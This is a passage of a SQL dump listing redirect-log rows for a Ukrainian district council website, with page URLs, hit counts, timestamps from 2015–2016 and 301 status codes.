00:00:00',301),(23551,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/dinak-92','','','',4,0,'2015-12-31 15:11:30','0000-00-00 00:00:00',301),(23552,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=uk&limitstart=5','','','',5,0,'2015-12-31 15:12:00','0000-00-00 00:00:00',301),(23553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=en&limitstart=20','','','',1,0,'2015-12-31 15:12:25','0000-00-00 00:00:00',301),(23554,'http://www.malyn-rayrada.org.ua/index.php/1218-16-zhovtnya-2015-roku-vidbudetsya-spilnij-seminar-navchannya-dlya-platnikiv-podatkiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 15:12:27','0000-00-00 00:00:00',301),(23555,'http://www.malyn-rayrada.org.ua/index.php/1220-ogoloshennya-pro-provedennya-konkursu-na-pravo-orendi-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-31 15:12:28','0000-00-00 00:00:00',301),(23556,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/262-pro-rozgljad-protestu-prokurora-malinskogo-rajonu_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-31 15:12:33','0000-00-00 00:00:00',301),(23557,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1254-pro-vnesennya-zmin-do-polozhennya-pro-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-31 15:12:35','0000-00-00 00:00:00',301),(23558,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&Itemid=86&lang=uk','','','',1,0,'2015-12-31 15:12:50','0000-00-00 00:00:00',301),(23559,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&Itemid=85&lang=uk','','','',1,0,'2015-12-31 15:12:51','0000-00-00 00:00:00',301),(23560,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45&Itemid=84&lang=ru','','','',1,0,'2015-12-31 15:12:52','0000-00-00 00:00:00',301),(23561,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1285-pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osviti-u-2016-rotsi?tmpl=componen','','','',1,0,'2015-12-31 15:12:53','0000-00-00 00:00:00',301),(23562,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=40:--28032012-&Itemid=77&lang=en','','','',1,0,'2015-12-31 15:12:55','0000-00-00 00:00:00',301),(23563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=uk&limitstart=20','','','',1,0,'2015-12-31 15:12:55','0000-00-00 00:00:00',301),(23564,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=736:2012-07-18-13-34-35&Itemid=82&lang=en','','','',1,0,'2015-12-31 15:12:58','0000-00-00 00:00:00',301),(23565,'http://www.malyn-rayrada.org.ua/index.php/1279-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-3-sesiyu-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-31 15:13:00','0000-00-00 00:00:00',301),(23566,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=412:-165-&Itemid=72&lang=uk','','','',1,0,'2015-12-31 15:13:02','0000-00-00 00:00:00',301),(23567,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&Itemid=12&lang=en','','','',1,0,'2015-12-31 15:13:02','0000-00-00 00:00:00',301),(23568,'http://www.malyn-rayrada.org.ua/index.php/1292-pro-perenesennya-dati-sklikannya-3-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-31 15:13:02','0000-00-00 00:00:00',301),(23569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&Itemid=33&lang=ru','','','',1,0,'2015-12-31 15:13:23','0000-00-00 00:00:00',301),(23571,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=ru&limitstart=10','','','',4,0,'2015-12-31 15:13:38','0000-00-00 00:00:00',301),(23572,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/11-pro-hid-vikonannja-rajonnoi-programi-realizacii?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-31 15:13:50','0000-00-00 00:00:00',301),(23573,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1253-pro-rajonnu-kompleksnu-programu-sotsialnoji-pidtrimki-uchasnikiv-antiteroristichnoji-operatsiji-ta-chleniv-jikh-simej-na-2016-2020-roki','','','',42,0,'2015-12-31 15:14:04','0000-00-00 00:00:00',301),(23574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&Itemid=14&lang=uk','','','',2,0,'2015-12-31 15:14:28','0000-00-00 00:00:00',301),(23575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=766:2012-09-28-08-37-31&Itemid=14&lang=en','','','',1,0,'2015-12-31 15:14:30','0000-00-00 00:00:00',301),(23576,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1296-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',55,0,'2015-12-31 15:14:30','0000-00-00 00:00:00',301),(23577,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/680-pro-zatverdzhennja-planu-dijalnosti-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-31 15:14:32','0000-00-00 00:00:00',301),(23578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=707:-231-280312-l-2012-r&Itemid=82&lang=ru','','','',1,0,'2015-12-31 15:14:34','0000-00-00 00:00:00',301),(23579,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=707:-231-280312-l-2012-r&Itemid=82&lang=uk','','','',1,0,'2015-12-31 15:14:34','0000-00-00 00:00:00',301),(23580,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/692-pro-zatverdzhennja-strukturi-ta-chiselnosti_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-12-31 15:14:35','0000-00-00 00:00:00',301),(23581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=452:-20-2011-100-l-r-&Itemid=73&lang=uk','','','',1,0,'2015-12-31 15:14:36','0000-00-00 00:00:00',301),(23582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=ru&limitstart=5','','','',2,0,'2015-12-31 15:14:36','0000-00-00 00:00:00',301),(23583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=ru&limitstart=20','','','',3,0,'2015-12-31 15:14:37','0000-00-00 00:00:00',301),(23584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&Itemid=14&lang=uk','','','',1,0,'2015-12-31 15:14:59','0000-00-00 00:00:00',301),(23585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=210:-2010-&catid=29:--15122010-&Itemid=60&lang=uk','','','',3,0,'2015-12-31 15:15:03','0000-00-00 00:00:00',301),(23586,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/5-pro-zatverdzhennja-tehnichnoi-dokumentacii-po?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-31 15:15:04','0000-00-00 00:00:00',301),(23587,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04?page=1','','','',9,0,'2015-12-31 15:15:05','0000-00-00 00:00:00',301),(23588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=uk&limitstart=5','','','',2,0,'2015-12-31 15:15:25','0000-00-00 00:00:00',301),(23589,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/10-pro-hid-vikonannja-rajonnoi-programi-shhodo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 15:15:27','0000-00-00 00:00:00',301),(23590,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1199-pro-zatverdzhennya-polozhennya-pro-poryadok-nadannya-pilg-z-orendnoji-plati-za-majno-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=co','','','',1,0,'2015-12-31 15:15:30','0000-00-00 00:00:00',301),(23591,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1200-pro-povtorne-zvernennya-do-prokuraturi-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-31 15:15:31','0000-00-00 00:00:00',301),(23592,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/231-pro-ne-zaperechennja-shhodo-nadannja-v?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-31 15:15:34','0000-00-00 00:00:00',301),(23593,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1203-pro-vinesennya-na-rozglyad-postijnikh-komisij-malinskoji-rajonnoji-radi-pitannya-vnesennya-zmin-do-statutu-kp-tsra-28?tmpl=component&print=1&layout=defau','','','',1,0,'2015-12-31 15:15:35','0000-00-00 00:00:00',301),(23594,'http://www.malyn-rayrada.org.ua/index.php/1211-vitaemo-z-dnem-vchitelya?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-12-31 15:15:58','0000-00-00 00:00:00',301),(23595,'http://www.malyn-rayrada.org.ua/index.php/1214-naperedodni-mistsevikh-viboriv-malinskij-mrv-usbu-v-zhitomirskij-oblasti-nagadue-telefon-doviri?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 15:16:00','0000-00-00 00:00:00',301),(23596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=uk&limitstart=15','','','',1,0,'2015-12-31 15:16:03','0000-00-00 00:00:00',301),(23597,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/258-pro-zatverdzhennja-rozmiru-vartosti-produktiv_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-31 15:16:05','0000-00-00 00:00:00',301),(23598,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1255-pro-programu-rozvitku-donorstva-krovi-ta-jiji-komponentiv-u-malinskomu-rajoni-na-2015-2018-roki?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-31 15:16:07','0000-00-00 00:00:00',301),(23599,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1257-pro-rajonnu-tsilovu-sotsialnu-programu-protidiji-vil-infektsiji-snidu-na-2015-2018-roki?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-31 15:16:08','0000-00-00 00:00:00',301),(23600,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=543:2012-01-26-11-58-53&catid=39&Itemid=76&lang=ru','','','',2,0,'2015-12-31 16:55:55','0000-00-00 00:00:00',301),(23601,'http://www.malyn-rayrada.org.ua/index.php/302-do-vidoma-zhiteliv-rajonu?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-12-31 17:33:26','0000-00-00 00:00:00',301),(23602,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46&layout=blog&Itemid=85&lang=en','','','',1,0,'2015-12-31 18:13:59','0000-00-00 00:00:00',301),(23603,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1267-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2016-rik','','','',7,0,'2015-12-31 18:40:59','0000-00-00 00:00:00',301),(23604,'http://malyn-rayrada.org.ua/index.php/component/acepolls/poll/1-chim-vam-zapam-yatavsya-2014-rik','','','',11,0,'2015-12-31 18:41:00','0000-00-00 00:00:00',301),(23605,'http://www.malyn-rayrada.org.ua/index.php/832-vidbulas-31-sesija-malinskoi-rajonnoi-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-12-31 20:18:04','0000-00-00 00:00:00',301),(23606,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=36&Itemid=70&lang=en','','','',1,0,'2015-12-31 20:23:43','0000-00-00 00:00:00',301),(23607,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=en&limitstart=15','','','',1,0,'2015-12-31 20:25:36','0000-00-00 00:00:00',301),(23608,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=45:--14112012-&Itemid=84&lang=en','','','',2,0,'2015-12-31 21:44:23','0000-00-00 00:00:00',301),(23609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=45:--14112012-&Itemid=84&lang=en','','','',2,0,'2015-12-31 22:11:28','0000-00-00 00:00:00',301),(23610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2015-12-31 23:09:05','0000-00-00 00:00:00',301),(23611,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani?page=4','','','',3,0,'2016-01-01 00:38:17','0000-00-00 00:00:00',301),(23612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=ru&limitstart=10','','','',1,0,'2016-01-01 00:40:04','0000-00-00 00:00:00',301),(23613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11&lang=uk','','','',5,0,'2016-01-01 01:13:19','0000-00-00 00:00:00',301),(23614,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=762:-210-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 05:03:38','0000-00-00 00:00:00',301),(23616,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=524:2011-12-30-10-17-39&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-01 05:05:12','0000-00-00 00:00:00',301),(23617,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1284:2014-04-17-13-00-18&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 05:14:43','0000-00-00 00:00:00',301),(23618,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=318:-2007-2011&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 05:16:34','0000-00-00 00:00:00',301),(23619,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=329:2011-05-20-16-25-10&Itemid=66&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 05:21:56','0000-00-00 00:00:00',301),(23620,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=777:2012-10-02-10-06-36&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 05:23:08','0000-00-00 00:00:00',301),(23621,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=504:-2012-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 05:33:59','0000-00-00 00:00:00',301),(23622,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58&id=1299:-lr-&lang=uk','','','',3,0,'2016-01-01 05:36:32','0000-00-00 00:00:00',301),(23623,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=610:2012-03-23-06-34-31&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 05:40:22','0000-00-00 00:00:00',301),(23624,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1204:2014-01-31-07-51-23&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 05:41:14','0000-00-00 00:00:00',301),(23625,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1140:80-1932-33-l-r&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 05:42:04','0000-00-00 00:00:00',301),(23626,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1197:-l-r-&Itemid=97&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 05:42:55','0000-00-00 00:00:00',301),(23627,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1145:2013-11-27-09-47-11&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 05:45:15','0000-00-00 00:00:00',301),(23628,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=702:-2011-2013-&Itemid=82&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 05:48:59','0000-00-00 00:00:00',301),(23629,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1186:-2013-i-2014-&Itemid=97&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 05:50:07','0000-00-00 00:00:00',301),(23630,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=911:2013-01-22-13-27-41&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 05:52:18','0000-00-00 00:00:00',301),(23631,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=863:-qq&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-01 05:53:33','0000-00-00 00:00:00',301),(23632,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=320:-2010-2014-&Itemid=66&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 05:57:24','0000-00-00 00:00:00',301),(23633,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=632:-2011-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 05:59:37','0000-00-00 00:00:00',301),(23634,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=789:-2012-2014-&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 06:01:15','0000-00-00 00:00:00',301),(23635,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=884:2012-12-24-10-46-13&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 06:02:38','0000-00-00 00:00:00',301),(23636,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=671:2012-05-09-13-09-05&lang=en&option=com_content&view=article','','','',2,0,'2016-01-01 06:09:04','0000-00-00 00:00:00',301),(23637,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1174:-2013-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:10:30','0000-00-00 00:00:00',301),(23638,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=659:-2011-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 06:11:51','0000-00-00 00:00:00',301),(23639,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=546:-l-r-&Itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 06:13:08','0000-00-00 00:00:00',301),(23640,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1289-pro-perelik-investitsijnikh-proektiv-shcho-mozhut-realizovuvatis-za-rakhunok-koshtiv-derzhavnogo-fondu-regionalnogo-rozvitku','','','',1,0,'2016-01-01 06:15:01','0000-00-00 00:00:00',301),(23641,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:15:41','0000-00-00 00:00:00',301),(23642,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1105:2013-10-11-16-43-25&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 06:23:15','0000-00-00 00:00:00',301),(23643,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=775:2012-10-02-09-35-53&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 06:24:36','0000-00-00 00:00:00',301),(23644,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=501:2011-12-14-13-07-32&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:25:27','0000-00-00 00:00:00',301),(23645,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=632:-2011-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 06:26:07','0000-00-00 00:00:00',301),(23646,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=960:-19-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 06:26:33','0000-00-00 00:00:00',301),(23647,'http://www.malyn-rayrada.org.ua/index.php?catid=30&id=229:-2011-&Itemid=61&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:26:47','0000-00-00 00:00:00',301),(23648,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1071:2013-08-27-14-06-18&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:27:28','0000-00-00 00:00:00',301),(23649,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1049:2013-07-15-05-50-46&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:28:43','0000-00-00 00:00:00',301),(23650,'http://www.malyn-rayrada.org.ua/index.php?id=13&Itemid=33&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-01-01 06:29:55','0000-00-00 00:00:00',301),(23651,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1165:-2014-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:32:12','0000-00-00 00:00:00',301),(23652,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=346:2011-06-15-12-31-02&Itemid=68&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 06:34:14','0000-00-00 00:00:00',301),(23653,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=739:2012-07-23-12-44-57&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 06:34:19','0000-00-00 00:00:00',301),(23654,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1140:80-1932-33-l-r&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:35:18','0000-00-00 00:00:00',301),(23655,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=690:2012-05-29-18-50-09&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 06:43:08','0000-00-00 00:00:00',301),(23656,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1144:--------lr&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:47:20','0000-00-00 00:00:00',301),(23657,'http://www.malyn-rayrada.org.ua/index.php?id=39:-22022012-&Itemid=76&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-01-01 06:49:47','0000-00-00 00:00:00',301),(23658,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1339:2014-06-12-09-22-34&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 06:51:55','0000-00-00 00:00:00',301),(23659,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 06:53:07','0000-00-00 00:00:00',301),(23660,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1349:-31-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2016-01-01 06:54:15','0000-00-00 00:00:00',301),(23661,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=759:2012-09-14-08-35-05&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 06:54:48','0000-00-00 00:00:00',301),(23662,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-01-01 06:55:20','0000-00-00 00:00:00',301),(23663,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1063:2013-08-02-17-32-04&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-01 07:22:16','0000-00-00 00:00:00',301),(23664,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=618:2012-03-29-08-39-48&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 07:26:26','0000-00-00 00:00:00',301),(23665,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=439:2011-10-21-16-22-19&Itemid=72&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 07:30:36','0000-00-00 00:00:00',301),(23666,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=795:-20-2011-108-l-r-&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 07:33:00','0000-00-00 00:00:00',301),(23667,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=609:-q-q&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 07:34:45','0000-00-00 00:00:00',301),(23668,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=804:2012-10-28-18-37-40&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 07:36:48','0000-00-00 00:00:00',301),(23669,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=808:2012-10-30-13-56-37&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 07:37:51','0000-00-00 00:00:00',301),(23670,'http://www.malyn-rayrada.org.ua/index.php?catid=0&id=424','','','',5,0,'2016-01-01 07:38:20','0000-00-00 00:00:00',301),(23671,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 07:39:32','0000-00-00 00:00:00',301),(23672,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=964:-2013-2017-&Itemid=88&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 07:42:23','0000-00-00 00:00:00',301),(23673,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=450:-l-2011-2013-r&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2016-01-01 07:43:48','0000-00-00 00:00:00',301),(23674,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1000:1&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 11:48:44','0000-00-00 00:00:00',301),(23675,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1194:-2012-2015-&Itemid=97&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 11:50:52','0000-00-00 00:00:00',301),(23676,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=468:-15-2011-120-l-r&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 11:51:14','0000-00-00 00:00:00',301),(23677,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=918:----------2013-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 11:53:21','0000-00-00 00:00:00',301),(23678,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=193:------------2009-2010-&Itemid=60&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 11:53:30','0000-00-00 00:00:00',301),(23679,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=580:-l-r-2012-2016-&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 11:54:20','0000-00-00 00:00:00',301),(23680,'http://www.malyn-rayrada.org.ua/index.php?catid=20&id=186:-6-&Itemid=42&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 11:54:25','0000-00-00 00:00:00',301),(23681,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=775:2012-10-02-09-35-53&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 11:54:43','0000-00-00 00:00:00',301),(23682,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1094:2013-09-24-05-02-52&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-01 11:55:05','0000-00-00 00:00:00',301),(23683,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=525:2011-12-30-10-19-27&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 11:55:33','0000-00-00 